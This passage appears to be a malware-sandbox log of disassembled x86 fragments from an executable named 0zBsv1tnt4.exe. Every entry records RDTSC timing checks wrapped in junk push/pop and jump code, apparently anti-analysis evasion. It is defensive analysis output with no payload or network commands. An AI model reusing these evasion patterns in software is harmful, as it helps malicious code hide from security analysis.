Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140AAD second address: 5140B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC22CC1B8B8h 0x00000013 jmp 00007FC22CC1B8B5h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007FC22CC1B8B0h 0x0000001f jmp 00007FC22CC1B8B5h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140B11 second address: 5140B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140B17 second address: 5140B75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [76C8459Ch], 05h 0x00000012 jmp 00007FC22CC1B8B6h 0x00000017 je 00007FC29E6F9758h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ebx, 13067270h 0x00000025 jmp 00007FC22CC1B8B9h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140C98 second address: 5140C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140C9E second address: 5140CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140D27 second address: 5140D59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22D01ECCEh 0x00000008 call 00007FC22D01ECD2h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 je 00007FC29EAF28FDh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140D59 second address: 5140D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140D5F second address: 5140D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150A7A second address: 5150A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150A7E second address: 5150A84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150A84 second address: 5150AB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC22CC1B8B0h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov bx, 3D80h 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 pushad 0x0000001a mov bl, al 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150AB8 second address: 5150B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FC22D01ECD3h 0x0000000b adc ecx, 2DD8A55Eh 0x00000011 jmp 00007FC22D01ECD9h 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [esp], esi 0x0000001b jmp 00007FC22D01ECCEh 0x00000020 mov esi, dword ptr [ebp+0Ch] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov cx, di 0x00000029 pushfd 0x0000002a jmp 00007FC22D01ECD9h 0x0000002f and esi, 1E5BD4F6h 0x00000035 jmp 00007FC22D01ECD1h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150B3F second address: 5150B6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c mov eax, 3DEF4973h 0x00000011 mov di, cx 0x00000014 popad 0x00000015 je 00007FC29E6E90FDh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ah, bh 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150B6E second address: 5150B74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150CE9 second address: 5150D01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 651DFBB second address: 651DFD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FC22D01ECC6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A2E6A second address: 66A2E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A2E73 second address: 66A2E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A21B0 second address: 66A21E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC22CC1B8B8h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC22CC1B8B1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A21E3 second address: 66A21FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22D01ECD4h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A2391 second address: 66A239B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC22CC1B8ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A250D second address: 66A253E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FC22D01ECC6h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FC22D01ECE0h 0x00000017 jnl 00007FC22D01ECC6h 0x0000001d jmp 00007FC22D01ECD4h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A26BF second address: 66A26C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A26C3 second address: 66A26EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22D01ECD8h 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FC22D01ECC6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A26EB second address: 66A26EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A26EF second address: 66A26F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A47CE second address: 66A47D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A493E second address: 66A4A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC22D01ECD7h 0x0000000a popad 0x0000000b nop 0x0000000c jng 00007FC22D01ECC9h 0x00000012 mov cx, di 0x00000015 push 00000000h 0x00000017 call 00007FC22D01ECC9h 0x0000001c jno 00007FC22D01ECCAh 0x00000022 push eax 0x00000023 jc 00007FC22D01ECD4h 0x00000029 mov eax, dword ptr [esp+04h] 0x0000002d push ecx 0x0000002e pushad 0x0000002f jmp 00007FC22D01ECCAh 0x00000034 push eax 0x00000035 pop eax 0x00000036 popad 0x00000037 pop ecx 0x00000038 mov eax, dword ptr [eax] 0x0000003a jo 00007FC22D01ECCEh 0x00000040 jo 00007FC22D01ECC8h 0x00000046 pushad 0x00000047 popad 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c push eax 0x0000004d jmp 00007FC22D01ECD3h 0x00000052 pop eax 0x00000053 pop eax 0x00000054 mov dword ptr [ebp+122D3B1Fh], ecx 0x0000005a mov edx, ecx 0x0000005c push 00000003h 0x0000005e mov cx, bx 0x00000061 push 00000000h 0x00000063 mov edi, 4C140527h 0x00000068 push 00000003h 0x0000006a call 00007FC22D01ECD0h 0x0000006f mov edi, dword ptr [ebp+122D2F7Dh] 0x00000075 pop esi 0x00000076 push 5FD3E9ECh 0x0000007b pushad 0x0000007c push eax 0x0000007d push edx 0x0000007e jbe 00007FC22D01ECC6h 0x00000084 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A4A08 second address: 66A4A6F instructions: 0x00000000 rdtsc 0x00000002 js 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FC22CC1B8A8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 add dword ptr [esp], 602C1614h 0x0000001a mov ecx, dword ptr [ebp+122D2ED9h] 0x00000020 lea ebx, dword ptr [ebp+1245A6B2h] 0x00000026 mov dword ptr [ebp+122D36AAh], ecx 0x0000002c xchg eax, ebx 0x0000002d push edx 0x0000002e push edi 0x0000002f je 00007FC22CC1B8A6h 0x00000035 pop edi 0x00000036 pop edx 0x00000037 push eax 0x00000038 pushad 0x00000039 pushad 0x0000003a jmp 00007FC22CC1B8B0h 0x0000003f jmp 00007FC22CC1B8B9h 0x00000044 popad 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A4AE8 second address: 66A4AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC22D01ECC6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A4AF3 second address: 66A4AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A4AFD second address: 66A4B4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor edx, dword ptr [ebp+122D2CBDh] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FC22D01ECC8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d stc 0x0000002e mov dword ptr [ebp+122D3A72h], esi 0x00000034 sub dword ptr [ebp+122D3ACCh], eax 0x0000003a push ADF7B0D2h 0x0000003f pushad 0x00000040 je 00007FC22D01ECCCh 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A4B4D second address: 66A4B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A4C33 second address: 66A4C3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FC22D01ECC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6695CE6 second address: 6695CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C4D53 second address: 66C4DA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC22D01ECCDh 0x00000008 jmp 00007FC22D01ECD1h 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007FC22D01ECCDh 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FC22D01ECD6h 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push esi 0x00000023 pop esi 0x00000024 pop eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C4DA9 second address: 66C4DAF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5173 second address: 66C5182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnc 00007FC22D01ECC6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C52ED second address: 66C52F9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC22CC1B8A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C547E second address: 66C5483 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5973 second address: 66C5991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC22CC1B8B4h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5E42 second address: 66C5E4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FC22D01ECC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5E4D second address: 66C5E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B9h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5E6F second address: 66C5E73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689E74 second address: 6689E78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689E78 second address: 6689E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC22D01ECC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689E87 second address: 6689E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689E8D second address: 6689EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FC22D01ECCEh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC22D01ECCCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689EB3 second address: 6689EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689EB7 second address: 6689EBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689EBB second address: 6689EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689EC1 second address: 6689EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689EC9 second address: 6689EDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FC22CC1B8AEh 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5FB3 second address: 66C5FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5FB9 second address: 66C5FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5FBF second address: 66C5FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5FC3 second address: 66C6013 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B4h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FC22CC1B8B5h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FC22CC1B8B7h 0x0000001a pushad 0x0000001b popad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C6928 second address: 66C6940 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C6940 second address: 66C6960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22CC1B8B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C6960 second address: 66C696B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66CA7DC second address: 66CA7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66CA7E1 second address: 66CA7E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C97EC second address: 66C9808 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC22CC1B8A8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC22CC1B8ADh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66CA992 second address: 66CA9A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jnp 00007FC22D01ECDBh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D508E second address: 66D5094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D5094 second address: 66D50F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC22D01ECD6h 0x0000000a popad 0x0000000b pushad 0x0000000c jno 00007FC22D01ECCCh 0x00000012 jnl 00007FC22D01ECD2h 0x00000018 jmp 00007FC22D01ECD2h 0x0000001d push ebx 0x0000001e jmp 00007FC22D01ECD2h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 668D4D2 second address: 668D4EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B5h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D45BD second address: 66D45C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D45C1 second address: 66D45E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8ABh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FC22CC1B8AFh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D45E1 second address: 66D45E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D45E6 second address: 66D462B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B4h 0x00000009 jmp 00007FC22CC1B8B9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 jnl 00007FC22CC1B8A8h 0x00000018 push eax 0x00000019 push edx 0x0000001a jne 00007FC22CC1B8A6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D4D2D second address: 66D4D46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D4D46 second address: 66D4D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FC22CC1B8A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D4D54 second address: 66D4D82 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC22D01ECC6h 0x00000008 js 00007FC22D01ECC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FC22D01ECCEh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC22D01ECCEh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D4EDC second address: 66D4F06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC22CC1B8B3h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66D877C second address: 66D879E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC22D01ECCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007FC22D01ECCCh 0x00000016 jo 00007FC22D01ECC6h 0x0000001c rdtsc
